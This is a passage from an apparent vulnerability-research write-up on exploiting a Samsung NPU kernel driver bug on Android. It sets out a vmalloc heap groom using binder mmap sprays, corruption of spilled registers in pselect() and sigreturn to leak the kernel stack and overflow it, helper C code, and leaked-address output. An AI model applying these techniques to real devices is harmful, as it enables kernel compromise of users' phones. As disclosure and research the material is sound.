Unfortunately, when I proposed this strategy to my teammates, Jann Horn pointed out a problem. In XNU, when you free a kernel_map allocation, that virtual memory region becomes immediately available for reuse. However, in Linux, freeing a vmalloc allocation usually just marks the allocation as freed without allowing you to immediately reclaim the virtual memory range; instead, the range becomes an "unpurged vm_area", and these areas are only properly freed and reclaimed once the amount of unpurged vm_area memory crosses a certain threshold. The reason Linux batches reclaiming freed virtual memory regions like this is to minimize the number of expensive global TLB flushes.

Consequently, this approach doesn't work exactly as we'd like: it's hard to know precisely when the unpurged vm_area allocations will be purged, so we can't be sure that we're reclaiming the hole to arrange our allocations. Nevertheless, it is possible to force a vm_area purge if you allocate and free enough memory. We just can't rely on the exact timing.
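To get a feel for what "enough memory" means, here is a minimal sketch of the threshold arithmetic. It assumes the kernel uses the upstream lazy_max_pages() heuristic from mm/vmalloc.c (fls(num_online_cpus()) * 32 MiB worth of pages), 4 KiB pages, and that each freed region is counted together with its one guard page. It ignores lazily freed memory that is already pending and purges triggered by other processes, so treat the result as a rough estimate, not a guarantee.

```c
#include <assert.h>

#define PAGE_SIZE_BYTES 0x1000UL         /* assumption: 4 KiB pages */
#define LAZY_BYTES_PER_LOG (32UL << 20)  /* 32 MiB, as in upstream lazy_max_pages() */

/* fls(): 1-based index of the most significant set bit, 0 for x == 0. */
static unsigned int fls_u32(unsigned int x)
{
    unsigned int r = 0;
    while (x) {
        r++;
        x >>= 1;
    }
    return r;
}

/* Bytes of lazily freed vmap space tolerated before a purge is attempted. */
unsigned long lazy_max_bytes(unsigned int online_cpus)
{
    return fls_u32(online_cpus) * LAZY_BYTES_PER_LOG;
}

/* Number of map_size-byte regions (each with one guard page) that must be
 * freed, starting from zero pending lazy pages, before the pending total
 * exceeds the threshold and a purge is attempted. */
unsigned long frees_to_force_purge(unsigned int online_cpus, unsigned long map_size)
{
    unsigned long per_free = map_size + PAGE_SIZE_BYTES;

    assert(map_size % PAGE_SIZE_BYTES == 0);
    return lazy_max_bytes(online_cpus) / per_free + 1;
}
```

For example, with 8 online CPUs the threshold works out to 128 MiB, so roughly 32 freed 4 MiB binder regions would be needed under these assumptions.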

Even though the straightforward approach wouldn't work, Ben and Jann did help me identify a useful allocation site for spraying controlled-size allocations using vmalloc(). The function binder_alloc_mmap_handler(), which implements mmap() called on /dev/binder file descriptors, contains a call to get_vm_area() on the specific kernel version I was exploiting. Thus, the following sequence of operations would allow me to perform a vmalloc() of any size up to 4 MiB:

int binder_fd = open("/dev/binder", O_RDONLY);
void *binder_map = mmap(NULL, vmalloc_size,
        PROT_READ, MAP_PRIVATE, binder_fd, 0);

The main annoyance with this approach is that only a single allocation can be made using each binder fd; to make multiple allocations, you need to open multiple fds.
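Wrapped into reusable helpers, the same idea might look like the sketch below. binder_region, binder_vmalloc(), binder_release(), and binder_spray() are hypothetical names; the open()/mmap() calls mirror the snippet above, with one fd per reservation. Releasing a region unmaps it and closes its fd, after which the kernel can free the reservation (lazily, as described above). On a machine without /dev/binder, every allocation simply fails.

```c
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/* One binder-backed vmalloc reservation (hypothetical helper type). */
struct binder_region {
    int fd;
    void *map;
    size_t size;
};

/* mmap() a fresh /dev/binder fd; binder_alloc_mmap_handler() then reserves a
 * kernel virtual region of the same size. Returns 0 on success, -1 on error. */
int binder_vmalloc(struct binder_region *r, size_t size)
{
    assert(r != NULL);
    r->fd = open("/dev/binder", O_RDONLY);
    if (r->fd < 0)
        return -1;
    r->map = mmap(NULL, size, PROT_READ, MAP_PRIVATE, r->fd, 0);
    if (r->map == MAP_FAILED) {
        close(r->fd);
        r->fd = -1;
        return -1;
    }
    r->size = size;
    return 0;
}

/* Drop the mapping and the fd so the kernel can free the reservation. */
void binder_release(struct binder_region *r)
{
    munmap(r->map, r->size);
    close(r->fd);
    r->fd = -1;
}

/* Make up to count reservations of size bytes, stopping at the first failure.
 * Only one mmap() is allowed per binder fd, hence one fd per reservation. */
size_t binder_spray(struct binder_region *regions, size_t count, size_t size)
{
    size_t i;

    for (i = 0; i < count; i++)
        if (binder_vmalloc(&regions[i], size) != 0)
            break;
    return i;
}
```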

On my rooted Samsung Galaxy S10 test device, it appeared that the vmalloc area contained a lot of unreserved space at the end, in particular between 0xffffff8050000000 and 0xffffff80f0000000:

0xffffff804a400000-0xffffff804a800000 4194304 vm_map_ram
0xffffff804a800000-0xffffff804ac00000 4194304 vm_map_ram
0xffffff804ac00000-0xffffff804b000000 4194304 vm_map_ram
0xffffff80f9e00000-0xffffff80faa00000 12582912 phys=0x00000009ef800000
0xffffff80fafe0000-0xffffff80fede1000 65015808
0xffffff80fefe0000-0xffffff80ff5e1000 6295552
0xffffff8100d00000-0xffffff8100d3a000  237568 phys=0x0000000095000000
0xffffffbebfdc8000-0xffffffbebfe80000  753664 pcpu_get_vm_areas+0x0/0x744 vmalloc
0xffffffbebfe80000-0xffffffbebff38000  753664 pcpu_get_vm_areas+0x0/0x744 vmalloc
0xffffffbebff38000-0xffffffbebfff0000  753664 pcpu_get_vm_areas+0x0/0x744 vmalloc

Thus, I came up with an alternative strategy to place a kernel thread stack after the ION buffer mapping:

  1. Open a large number of /dev/binder fds.
  2. Spray a large amount of vmalloc memory using the binder fds and then close them, forcing a vm_area purge. We can't be sure of exactly when this purge occurs, so some unpurged vm_area regions will still be left. But forcing a purge will expose any holes at the start of the vmalloc area so that we can fill them in the next step. This prevents these holes from opening up at a later stage, messing up the groom.
  3. Now spray many allocations using the binder fds in decreasing sizes: 4 MiB, 2 MiB, 1 MiB, etc., all the way down to 0x4000 bytes. The idea is to efficiently fill holes in the vmalloc heap so that we eventually start allocating from clean virtual address space, like the 0xffffff8050000000 region identified earlier. The first binder vmallocs will fill the large holes, then later allocs will fill smaller and smaller holes, until eventually all 0x5000-byte holes are filled. (It is 0x5000 not 0x4000 because the allocations have a guard page at the end.)
  4. Now create some user threads. Their 0x4000-byte kernel stacks (0x5000-byte reservations including the guard page) will be allocated from the fresh virtual memory area at the end of the vmalloc region.
  5. Now trigger the vulnerable ioctl to map the ION buffer into the vmalloc region. If the ION buffer is chosen to have size 0x4000 bytes, it will also be placed in the fresh virtual memory area at the end of the vmalloc region.
  6. Finally, create some more user threads. Once again, their kernel stacks will be allocated from the fresh VA space, and they will thus be placed directly after the ION buffer, achieving our goal.
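The decreasing-size schedule from step 3 can be computed as below. This is only a sketch: the function name is hypothetical, and the number of allocations to make at each size is not specified above; a real spray would presumably keep allocating at a given size until the allocations stop landing in holes. Each entry of s bytes reserves s + 0x1000 bytes once the guard page is included.

```c
#include <assert.h>
#include <stddef.h>

/* Fill sizes[] with max_size, max_size/2, ... down to min_size (inclusive).
 * Returns the number of entries written, at most cap. */
size_t hole_fill_schedule(size_t *sizes, size_t cap, size_t max_size, size_t min_size)
{
    size_t n = 0;

    assert(min_size > 0 && min_size <= max_size);
    for (size_t s = max_size; s >= min_size && n < cap; s /= 2)
        sizes[n++] = s;
    return n;
}
```

With max_size = 4 MiB and min_size = 0x4000 this yields nine sizes, each of which would be fed to a binder mmap() spray.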

This technique actually seemed to work reasonably well. By dumping /proc/vmallocinfo at each step, it's possible to check that the kernel heap is being laid out as we hope. And indeed, it did appear that we were getting the ION buffer allocated directly before kernel thread stacks:

0xffffff8083ba0000-0xffffff8083ba5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8083ba8000-0xffffff8083bad000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8083bad000-0xffffff8083bb2000   20480 ion_heap_map_kernel+0x110/0x16c vmap
0xffffff8083bb8000-0xffffff8083bbd000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8083bc0000-0xffffff8083bc5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8083bc8000-0xffffff8083bcd000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8083bd0000-0xffffff8083bd5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff80f9e00000-0xffffff80faa00000 12582912 phys=0x00000009ef800000
0xffffff80fafe0000-0xffffff80fede1000 65015808
0xffffff80fefe0000-0xffffff80ff5e1000 6295552

Stack manipulation

At this point we can groom the kernel heap to place the kernel stack for one of our process's threads directly after the ION buffer, giving us the ability to manipulate the thread's stack while it is blocked in a syscall. The next question is what we should manipulate.

In order to answer this, we really need to understand the constraints of our bug. As discussed above, our primitive is the ability to perform an out-of-bounds addition on a 32-bit unsigned value, adding in the ION buffer's device address (daddr), so long as the original value being modified is less than the ION buffer's size.

The code in npu-session.c performs a copious amount of logging, so it's possible to check the address of the ION allocation from a root shell using the following command:

cat /proc/kmsg | grep ncp_ion_map

In my early tests, the ION buffer's daddr was usually between 0x80500000 and 0x80700000, and always matched the mask 0x80xx0000. If we use a size of 0x4000 for our ION buffer, then our primitive will transform a small positive value on the stack into a very large positive (unsigned) or negative (signed) value; for example, we might transform 0x1000 into 0x80611000.

How would we use this to gain code execution? Jann suggested a very interesting trick that could block calls to the functions copy_from_user() and copy_to_user() for arbitrary amounts of time, which could greatly expand the set of block points available during system calls.

copy_from_user() and copy_to_user() are the Linux equivalents of XNU's copyin() and copyout(): They are used to copy memory from userspace into the kernel (copy_from_user()) or to copy memory from the kernel into userspace (copy_to_user()). It's well known that these operations can be blocked by using tricks involving userfaultfd, but this won't be available to us in an exploit from app context. Nevertheless, Jann had discovered that similar tricks could be done using proxy file descriptors (an abstraction over FUSE provided by system_server and vold), essentially allowing page faults on userspace pages to be blocked for arbitrary amounts of time.

One particularly interesting target while blocking a copy_from_user() operation would be copy_from_user() itself. When copy_from_user() performs the actual copy operation in __arch_copy_from_user(), the first access to the magical blocking memory region will trigger a page fault, causing an exception to be delivered and spilling all the registers of __arch_copy_from_user() to the kernel stack while the fault is being processed. During that time, we could come in on another thread using our out-of-bounds addition to increase the size argument to __arch_copy_from_user() where it is spilled onto the stack. That way, once we service the page fault via the proxy file descriptor and allow the exception to return, the modified size value will be popped back into the register and __arch_copy_from_user() will copy more data than expected into kernel memory. If the buffer being copied into lives on the stack, this gives us a deterministic controlled stack buffer overflow that we can use to clobber a return address and get code execution. And the same idea can be applied to copy_to_user() to copy extra memory out of the kernel instead, disclosing kernel stack contents and allowing us to break KASLR and leak the stack cookie.

In order to figure out which spilled register we'd need to target, I looked at __arch_copy_to_user() in IDA. Unfortunately, there's one other complication in making this technique work: due to unrolling, __arch_copy_to_user() will only enter a loop if the size is at least 128 bytes on entry. This means that we'll need to target a syscall that calls copy_to_user() with a size of at least 128 bytes.

Fortunately, it didn't take long to find several good stack disclosure candidates, such as the newuname() syscall:

SYSCALL_DEFINE1(newuname, struct new_utsname __user *, name)
{
    struct new_utsname tmp;

    memcpy(&tmp, utsname(), sizeof(tmp));

    if (copy_to_user(name, &tmp, sizeof(tmp)))
        return -EFAULT;
    /* ... */
}

The new_utsname struct that gets copied out is 0x186 bytes, which means we should enter the looping path in __arch_copy_to_user(). When that access faults, the register containing the copy size 0x186 will be spilled to the stack, and we can change it to a very large value like 0x80610186 before unblocking the fault. To prevent the copy-out from running off the end of the kernel stack, we will leave the userspace page after the magic blocking page unmapped, causing __arch_copy_to_user() to terminate early and cleanly.
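The numbers above can be checked with a small layout mirror of the kernel's struct new_utsname (six strings of __NEW_UTS_LEN + 1 = 65 bytes each). The placement helper is a hypothetical illustration of where the userspace output buffer would go so that the legitimate copy-out ends exactly at a page boundary, with the following page left unmapped.

```c
#include <assert.h>
#include <stdint.h>

#define NEW_UTS_LEN 64   /* mirrors the kernel's __NEW_UTS_LEN */

/* Layout mirror of the kernel's struct new_utsname. */
struct new_utsname_mirror {
    char sysname[NEW_UTS_LEN + 1];
    char nodename[NEW_UTS_LEN + 1];
    char release[NEW_UTS_LEN + 1];
    char version[NEW_UTS_LEN + 1];
    char machine[NEW_UTS_LEN + 1];
    char domainname[NEW_UTS_LEN + 1];
};

/* Hypothetical helper: user address for the newuname() output buffer so the
 * legitimate copy-out ends exactly at the end of the page at page_start;
 * any extra bytes would spill into the next page, which is left unmapped. */
uintptr_t uname_buf_at_page_end(uintptr_t page_start, uintptr_t page_size)
{
    assert(page_size >= sizeof(struct new_utsname_mirror));
    return page_start + page_size - sizeof(struct new_utsname_mirror);
}
```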

The write path

The above trick should work for reading past the end of a stack buffer; what about for writing?

Here again I ran into a new complication, and this one was significant: copy_from_user() will zero out any unused space in the buffer that was not successfully copied from userspace:

_copy_from_user(void *to, const void __user *from, unsigned long n)
{
    unsigned long res = n;

    if (likely(access_ok(VERIFY_READ, from, n))) {
        kasan_check_write(to, n);
        res = raw_copy_from_user(to, from, n);
    }
    if (unlikely(res))
        memset(to + (n - res), 0, res);
    return res;
}

This means that copy_from_user() won't let us truncate the write early as we did with copy_to_user() by having an unmapped page after the blocking region. Instead, it will try to memset the memory past the end of the buffer to zero, all the way up to the modified size of at least 0x80500000. copy_from_user() is out.
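The difference between the two copy-in flavors can be modeled in userspace as below, where `readable` stands in for the number of source bytes available before a fault. The function names are hypothetical and this models behavior, not kernel code: the zeroing variant always writes all n destination bytes, which with a corrupted n of at least 0x80500000 would run far past the end of the kernel stack, while the raw variant simply stops at the fault.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Model of raw_copy_from_user()/__copy_from_user(): copy what is readable and
 * return the number of bytes NOT copied, without zeroing anything. */
size_t model_raw_copy_from_user(unsigned char *to, const unsigned char *from,
                                size_t n, size_t readable)
{
    size_t copied = readable < n ? readable : n;

    memcpy(to, from, copied);
    return n - copied;
}

/* Model of _copy_from_user(): the same copy, then zero whatever was not
 * copied, so all n destination bytes are always written. */
size_t model_copy_from_user(unsigned char *to, const unsigned char *from,
                            size_t n, size_t readable)
{
    size_t res = model_raw_copy_from_user(to, from, n, readable);

    assert(res <= n);
    if (res)
        memset(to + (n - res), 0, res);
    return res;
}
```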

Thankfully, there are some calls to the alternative function __copy_from_user(), which does not perform this unwanted memset. But these are much rarer, and thus we'll have a very limited selection of syscalls to target.

In fact, pretty much the only call to __copy_from_user() with a large size that I could find was in restore_fpsimd_context(), reached via the sys_rt_sigreturn() syscall. This syscall seems to be related to signal handling, and in particular restoring user context after returning from a signal handler. This particular __copy_from_user() call is responsible for copying in the floating-point register state (registers Q0 - Q31) after validating the signal frame on the user's stack.
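For reference, the 512 bytes are the 32 128-bit vector registers. The sketch below mirrors the layout of arm64's struct fpsimd_context from asm/sigcontext.h, using byte arrays in place of __uint128_t (an assumption that happens to preserve the offsets here). In upstream arch/arm64/kernel/signal.c, restore_fpsimd_context() copies these registers into a local struct user_fpsimd_state, which is what makes this a stack buffer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Layout mirrors (for illustration) of the arm64 signal-frame FP/SIMD record. */
struct aarch64_ctx_mirror {
    uint32_t magic;
    uint32_t size;
};

struct fpsimd_context_mirror {
    struct aarch64_ctx_mirror head;  /* read and checked before the copy */
    uint32_t fpsr;
    uint32_t fpcr;
    uint8_t vregs[32][16];           /* Q0..Q31: the 0x200-byte copy-in */
};

/* Byte count of the vector-register copy performed on sigreturn. */
size_t fpsimd_copy_size(void)
{
    return sizeof(((struct fpsimd_context_mirror *)0)->vregs);
}
```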

The size parameter at this callsite is 512 (0x200) bytes, which is large enough to enter the looping path in __arch_copy_from_user(). However, the address of the floating point register state that is read from during the copy-in is part of the userspace thread's signal frame on the stack, so it would be very tricky to ensure that both

  1. the first access to the blocking page (which must be part of the thread's stack) is in the target call to __copy_from_user() rather than earlier in the signal frame parsing, and
  2. the address passed to __copy_from_user() is deep enough into the blocking page that we hit a subsequent unmapped page in userspace before overflowing off the end of the kernel stack.

These two requirements are in direct conflict: Since the signal frame before the floating-point register state will be accessed in parse_user_sigframe(), the first requirement effectively means we need to put the floating-point state at the very start of the blocking page, so that the values right before can be accessed without triggering the blocking fault. But at the same time, the second requirement forces us to put the floating-point state towards the end of the blocking page so that we can terminate the __arch_copy_from_user() before running off the end of the kernel stack and triggering a panic. It's impossible to satisfy both of these requirements.

At this point I started looking at alternative ways to use our primitive to work around this conflict. In particular, we know that the __arch_copy_from_user() size parameter on entry will be 0x200, that ION buffers have addresses like 0x80xx0000, and that our addition need not be aligned. So, what if we overlapped only the most-significant byte of the ION address with the least-significant byte of the size parameter?

When __arch_copy_from_user() faults, its registers will be spilled to memory in the order X0, X1, X2, and so on. Register X2 holds the size value, which in our case will be 0x200, and X1 stores the userspace address being copied from. If we assume the upper 3 bytes of the userspace address are zero, then we get the following little-endian layout of X1 and X2 in memory:

          X1            |           X2
UU UU UU UU UU 00 00 00 | 00 02 00 00 00 00 00 00

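Then, if we come in with our unaligned addition using a daddr of 0x80610000, starting 3 bytes before X2 (so that the daddr's little-endian bytes 00 00 61 80 cover the top 3 bytes of X1 and the lowest byte of X2):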

          X1            |           X2
UU UU UU UU UU 00 00 61 | 80 02 00 00 00 00 00 00

Thus, we've effectively increased the value of X2 from 0x200 to 0x280, which should be large enough to corrupt the stack frame of sys_rt_sigreturn() but small enough to avoid running off the end of the kernel stack.

The consequence of using an unaligned addition like this is that we've also corrupted the value of X1, which stores the userspace address from which to copy in the data. Instead of the upper bytes being all 0, the top byte is now nonzero. Quite fortunately, however, this isn't a problem because the kernel was compiled with support for the Top Byte Ignore (TBI) architectural feature enabled for userspace, which means that the top byte of the pointer will be ignored for the purpose of address translation by the CPU.

This gives us a reasonably complete exploit flow:

  1. Create 2 "blocking pages" using proxy file descriptors.
  2. Map the first blocking page before an unmapped page, and invoke the newuname() syscall with a pointer towards the end of the first blocking page. The copy_to_user() will fault and block, waiting on the corresponding proxy fd.
  3. Use the out-of-bounds addition to increase the spilled value of register X2 from __arch_copy_to_user().
  4. Fulfill the requested data on the first proxy fd, allowing the page fault to complete and resuming __arch_copy_to_user(). The copy-out will proceed past the end of the stack buffer, disclosing the stack cookie and the return address, but stopping at the unmapped page.
  5. Create a fake signal stack frame around a mapping of the second blocking page and invoke the sys_rt_sigreturn() syscall.
  6. sys_rt_sigreturn() will call __copy_from_user() with size 0x200 and fault trying to access the blocking page.
  7. Use the out-of-bounds addition to increase the spilled value of register X2 from __arch_copy_from_user(), but align the addition such that only the least significant byte of X2 is changed. This will bump the spilled value from 0x200 to 0x280.
  8. Fulfill the requested data on the second proxy fd, allowing the page fault to complete and resuming __arch_copy_from_user(). The copy-in will overflow the stack buffer, overwriting the return address.
  9. When sys_rt_sigreturn() returns, we will gain code execution.

Blocking problems

When I tried to implement this technique, I ran into a fatal problem: I couldn't seem to mmap() the proxy file descriptor in order to create the memory regions that would be used to block copy_to/from_user().

I checked with Jann, and he discovered that the SELinux policy change that would allow mapping the proxy file descriptors was quite recent, and unfortunately too new to be available on my device:

 # For app fuse.
-allow appdomain app_fuse_file:file { getattr read append write };
+allow appdomain app_fuse_file:file { getattr read append write map };

This change was committed in March of 2020, and apparently would not reach my device until after the NPU bug I was exploiting had been fixed. Thus, I couldn't rely on blocking copy_to/from_user() after all, and would need to find an alternative target.

Thankfully, due to his copious knowledge of Linux internals, Jann was quickly able to suggest a few different strategies worth investigating. Since this post is already quite long I'll avoid explaining each of them and jump directly to the one that was the most promising: select().

Revisiting the read

Since my previous strategy relied on the blocking memory region for both the stack disclosure (read) and stack buffer overflow (write) steps, I'd need to revisit both of them. But for right now, we'll focus on the read part.

The pselect() system call is an interesting target for our out-of-bounds addition primitive because it will deterministically block before calling copy_to_user() to copy out the contents of a stack buffer. Not only that, but the amount of memory to copy out to userspace is controllable rather than being hardcoded. Thus, we'll have an opportunity to modify the size parameter in a call to copy_to_user() while pselect() is blocked, and increasing the size should cause the kernel to disclose out-of-bounds stack memory.

Here's the relevant code from core_sys_select(), which implements the core logic of the syscall:

int core_sys_select(int n, fd_set __user *inp, fd_set __user *outp,
               fd_set __user *exp, struct timespec64 *end_time)
{
    /* ... */
    /* Allocate small arguments on the stack to save memory and be faster */
    long stack_fds[SELECT_STACK_ALLOC/sizeof(long)];
    /* ... */
    /*
     * We need 6 bitmaps (in/out/ex for both incoming and outgoing),
     * since we used fdset we need to allocate memory in units of
     * long-words.
     */
    size = FDS_BYTES(n);
    bits = stack_fds;
    if (size > sizeof(stack_fds) / 6) {
        /* Not enough space in on-stack array; must use kmalloc */
        /* ... */
        bits = kvmalloc(alloc_size, GFP_KERNEL);
        /* ... */
    }
    fds.in      = bits;
    fds.out     = bits +   size;
    fds.ex      = bits + 2*size;
    fds.res_in  = bits + 3*size;
    fds.res_out = bits + 4*size;
    fds.res_ex  = bits + 5*size;

    // get_fd_set() calls copy_from_user()
    if ((ret = get_fd_set(n, inp, fds.in)) ||
        (ret = get_fd_set(n, outp, fds.out)) ||
        (ret = get_fd_set(n, exp, fds.ex)))
        goto out;
    zero_fd_set(n, fds.res_in);
    zero_fd_set(n, fds.res_out);
    zero_fd_set(n, fds.res_ex);

    // do_select() may block
    ret = do_select(n, &fds, end_time);
    /* ... */

    // set_fd_set() calls __copy_to_user()
    if (set_fd_set(n, inp, fds.res_in) ||
        set_fd_set(n, outp, fds.res_out) ||
        set_fd_set(n, exp, fds.res_ex))
        ret = -EFAULT;
    /* ... */
}

As you can see, the local variable n must be saved to the stack while do_select() blocks, which means that it can be modified before the call to set_fd_set() copies out the corresponding number of bytes to userspace. Also, if n is small, then the 256-byte stack_fds buffer will be used rather than a heap-allocated buffer.
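The on-stack condition can be made concrete with mirrors of the select size macros as they appear in upstream Linux (fs/select.c, with SELECT_STACK_ALLOC = 256 from linux/poll.h). The helper name is hypothetical. With 256 / 6 = 42 bytes available per bitmap, any n up to 320 keeps core_sys_select() on the stack_fds buffer.

```c
#include <assert.h>
#include <stddef.h>

/* Mirrors of the upstream definitions. */
#define SELECT_STACK_ALLOC 256
#define FDS_BITPERLONG (8 * sizeof(long))
#define FDS_LONGS(nr) (((nr) + FDS_BITPERLONG - 1) / FDS_BITPERLONG)
#define FDS_BYTES(nr) (FDS_LONGS(nr) * sizeof(long))

/* Returns 1 if core_sys_select() would use its on-stack stack_fds buffer for
 * this n, i.e. it would not fall back to kvmalloc(). */
int select_uses_stack_fds(int n)
{
    /* sizeof(stack_fds) for long stack_fds[SELECT_STACK_ALLOC/sizeof(long)] */
    size_t stack_bytes = (SELECT_STACK_ALLOC / sizeof(long)) * sizeof(long);
    size_t size;

    assert(n >= 0);
    size = FDS_BYTES((size_t)n);
    return !(size > stack_bytes / 6);
}
```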

This code actually looks a bit different when compiled in the kernel due to optimization and inlining. In particular, the variable n is not used during the subsequent calls to __arch_copy_to_user(), but rather a hidden variable with the value 8 * size allocated to register X22. Thus, wherever X22 gets spilled to the stack during the prologue of do_select(), that's the address we need to target to change the size passed to __arch_copy_to_user().

But there's one other unfortunate consequence we'll have to deal with when moving from the old "blocking page" technique to this new technique: Before, we were modifying the size to be copied out during the execution of __arch_copy_to_user() itself, after all the sanity checks had passed on the original (unmodified) value. Now, however, we're trying to pass the corrupted value directly to __copy_to_user(), which means we'll need to ensure that we don't trip any of the checks. In particular, __copy_to_user() has a call to check_object_size() which will fail if the copy-out extends beyond the bounds of the stack.

Thankfully, we've already solved this particular problem when dealing with sys_rt_sigreturn(). Just like in that case, we can set the offset of our out-of-bounds addition such that only the least significant byte of the spilled X22 is modified. But to satisfy the precondition of our addition, namely that the initial value being modified is smaller than the size of the ION buffer, we need the least significant byte of X22 to be 0.

Because core_sys_select() will stop using the stack_fds buffer if n is too large, this constraint actually admits only a single solution: n = 0. That is, we will need to call select() on 0 file descriptors, which will cause the value X22 = 0 to be stored to the stack when do_select() blocks, at which point we can use our out-of-bounds addition to increase X22 to 0x80.

Thankfully, the logic of core_sys_select() functions just fine with n = 0; even better, the stack_fds buffer is only zeroed for positive n, so bumping the copy-out size to 0x80 will allow us to read uninitialized stack buffer contents. So this technique should allow us to turn the out-of-bounds addition into a useful kernel stack disclosure.
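From userspace, the blocking call itself is unremarkable. The sketch below (pselect_zero_probe() is a hypothetical name) blocks in pselect() on zero descriptors with a non-NULL read set and reports how many bytes of that set changed. On an unmodified kernel, n = 0 means nothing is copied back, so the set should come back untouched; in the exploit, the copy-out size is corrupted while the thread sleeps in do_select(), and a real probe would presumably pass a buffer large enough for the enlarged copy-out.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* for pselect() */
#endif
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/select.h>
#include <time.h>

/* Block in pselect(0, ...) for timeout_ns with a canary-filled read set.
 * Returns pselect()'s result and stores the number of changed bytes. */
int pselect_zero_probe(unsigned char fill, long timeout_ns, size_t *changed)
{
    fd_set set;
    struct timespec ts;
    const unsigned char *bytes = (const unsigned char *)&set;
    int ret;

    assert(changed != NULL);
    assert(timeout_ns >= 0 && timeout_ns < 1000000000L);
    ts.tv_sec = 0;
    ts.tv_nsec = timeout_ns;
    memset(&set, fill, sizeof(set));

    /* n = 0: the kernel copies FDS_BYTES(0) = 0 bytes in and out. */
    ret = pselect(0, &set, NULL, NULL, &ts, NULL);

    *changed = 0;
    for (size_t i = 0; i < sizeof(set); i++)
        if (bytes[i] != fill)
            (*changed)++;
    return ret;
}
```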

Unfortunately, when I began implementing this, I ran into another significant problem. When the prologue of do_select() saves X22 to the stack, it places register X23 right before X22, and X23 contains a kernel pointer at this point. This messes up the precondition for our out-of-bounds addition, because the unaligned value overlapping the least significant byte of X22 will be too large:

          X23           |           X22
XX XX XX XX 80 ff ff ff | 00 00 00 00 00 00 00 00

In order for our precondition to be met, we'd need an ION buffer larger than 0x00ffffff bytes (really, 0x01000000 due to granularity). My impression was that ION memory is quite scarce; is it even possible to allocate an ION buffer that large?

It turns out, yes! I had just assumed that such a large allocation (16 MiB) would fail, but it turns out to work just fine. So, all we have to do is increase the size of the ION buffer initially allocated to 0x1000000, and we should be able to modify register X22.

What about X23, won't that register be corrupted? It will, but thankfully X23 happens to be unused by core_sys_select() after the call to do_select(), so it doesn't actually matter that we clobber it.

At last, we have a viable stack disclosure strategy!

  1. Allocate a 16 MiB ION buffer.
  2. Perform the vmalloc purge using binder fds.
  3. Spray binder vmallocs to consume all vmalloc holes down to size 0x5000, and cause vmalloc() to start allocating from fresh VA space.
  4. Spray thread stacks to fill any remaining 0x5000-byte holes leading up to the fresh VA space.
  5. Map the ION buffer into the fresh VA space by invoking the vulnerable ioctl.
  6. Spray thread stacks; these should land directly after the ION buffer mapping.
  7. Call pselect() from the thread directly after the ION buffer with n = 0; this call will block for the specified timeout.
  8. Call ioctl() on the main thread to perform the out-of-bounds addition, targeting the value of X22 from core_sys_select(). Align the addition to bump the value from 0 to 0x80.
  9. When do_select() unblocks due to timeout expiry, the modified value of X22 will be passed to __copy_to_user(), disclosing uninitialized kernel stack contents to userspace.

And after a few false starts, this strategy turned out to work perfectly:

Samsung NPU driver exploit
ION 0x80850000 [0x01000000]
Allocated ION buffer
Found victim thread!
buf = 0x74ec863b30
pselect() ret = 0 Success
buf[00]:  0000000000000124
buf[08]:  0000000000000015
buf[10]:  ffffffc88f303b80
buf[18]:  ffffff8088adbdd0
buf[20]:  ffffffc89f935e00
buf[28]:  ffffff8088adbd10
buf[30]:  ffffff8088adbda8
buf[38]:  ffffff8088adbd90
buf[40]:  ffffff8008f814e8
buf[48]:  0000000000000000
buf[50]:  ffffffc800000000

By inspecting the leaked buffer contents, it appears that buf[38] is a stack frame pointer and buf[40] is a return address. Thus we now know both the address of the victim stack, from which we can deduce the address of the ION buffer mapping, and the address of a kernel function, which allows us to break KASLR.
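The two leaks can be turned into addresses with simple arithmetic. This sketch assumes 16 KiB kernel stacks that are at least 16 KiB-aligned (consistent with the vmallocinfo output above), and the unslid address in the test is a made-up stand-in for the static address of the same return site, which would come from the kernel image. Deducing the ION mapping from the stack base additionally needs the fixed offset produced by the groom, which is not hard-coded here.

```c
#include <assert.h>
#include <stdint.h>

#define KSTACK_SIZE 0x4000ULL   /* assumption: 16 KiB, suitably aligned stacks */

/* Base of the kernel stack containing the leaked frame pointer fp. */
uint64_t kstack_base_from_fp(uint64_t fp)
{
    assert((KSTACK_SIZE & (KSTACK_SIZE - 1)) == 0);   /* power of two */
    return fp & ~(KSTACK_SIZE - 1);
}

/* KASLR slide: leaked return address minus the unslid address of the same
 * instruction in the kernel image (obtained offline; hypothetical input). */
int64_t kaslr_slide(uint64_t leaked_ret, uint64_t unslid_ret)
{
    return (int64_t)(leaked_ret - unslid_ret);
}
```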

Revisiting the write

Pretty much the only thing left to do is find a way to overflow a stack buffer using our primitive. Once we do this, we should be able to build a ROP chain that will give us some as-yet-unspecified kernel read/write capability.

For now, we won't worry about what to do after the overflow because ROP should be a sufficiently generic technique to implement whatever final read/write capability we want. Admittedly, for an iOS kernel exploit the choice of final capability would have substantial influence on the shape of the exploit flow. But this is because the typical iOS exploit achieves stable kernel read/write before kernel code execution, especially since the arrival of PAC. By contrast, if we can build a stack buffer overflow, we should be able to get ROP execution directly, which is in many ways more powerful than kernel read/write.

Actually, thinking about PAC and iOS gave me an idea.

When a userspace thread enters the kernel, whether due to a system call, page fault, IRQ, or any other reason, the userspace thread's register state needs to be saved in order to be able to resume its execution later. This includes the general-purpose registers X0 - X30 as well as SP, PC, and SPSR ("Saved Program Status Register", alternatively called CPSR or PSTATE). These values get saved to the end of the thread's kernel stack right at the beginning of the exception vector.
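On arm64 Linux, the saved user state has the layout of the UAPI struct user_pt_regs, which also forms the start of the kernel's struct pt_regs frame. The mirror below is for illustration only; the point it makes is that the saved PC is immediately followed by the saved PSTATE (the SPSR value), so a single unaligned write can straddle the two.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Layout mirror of arm64's struct user_pt_regs (asm/ptrace.h). */
struct user_pt_regs_mirror {
    uint64_t regs[31];   /* X0..X30 */
    uint64_t sp;         /* user SP (SP_EL0) */
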